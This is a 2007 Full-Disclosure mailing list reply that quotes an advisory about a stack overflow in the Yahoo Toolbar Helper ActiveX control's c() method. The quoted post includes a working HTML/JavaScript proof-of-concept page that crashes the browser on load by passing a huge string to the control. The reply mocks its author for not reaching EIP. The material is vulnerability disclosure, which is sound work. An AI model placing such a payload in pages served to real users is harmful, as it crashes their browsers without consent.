Re: [Full-disclosure] Yahoo Toolbar Helper c() Method Stack Overflow DoS
- From: "Joey Mengele" <joey.mengele@xxxxxxxxxxxx>
- Date: Fri, 30 Nov 2007 10:59:37 -0500
Yeah, strange how EIP isn't overwritten with your hacker savvy 0x41
characters. Except for the fact that this again is a stack overflow
exception and not a stack based buffer overflow. I implore you,
LEAVE THE TROLLING TO THE PROFESSIONALS. Thanks.
J
On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad
<elazarb@xxxxxxxxxxxxx> wrote:
There is a stack overflow in the c() method of the Yahoo Toobar
Helper class. This overflow does not appear to get anywhere near
the EIP or SEH. PoC as follows:
----------------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 999999) s=s+s;
var obj = new ActiveXObject("yt.ythelper.2"); //{02478D38-
C3F9-4EFB-9B51-7695ECA05670}
obj.c(s);
}
</script>
</head>
<body onload="JavaScript: return Check();">
</body>
</html>
----------------------
Elazar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
Click here for to find products that will help grow your small business.
http://tagline.hushmail.com/fc/Ioyw6h4eDJdaRPJuJyztiEAJ83hvsi2qyqoJMOdLAcA5KZpqWleU5a/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Prev by Date: [Full-disclosure] rPSA-2007-0254-1 idle python
- Next by Date: [Full-disclosure] High Value Target Selection
- Previous by thread: [Full-disclosure] Yahoo Toolbar Helper c() Method Stack Overflow DoS
- Next by thread: [Full-disclosure] Matasano watchdog blog opening shortly ..
- Index(es):
Relevant Pages
|
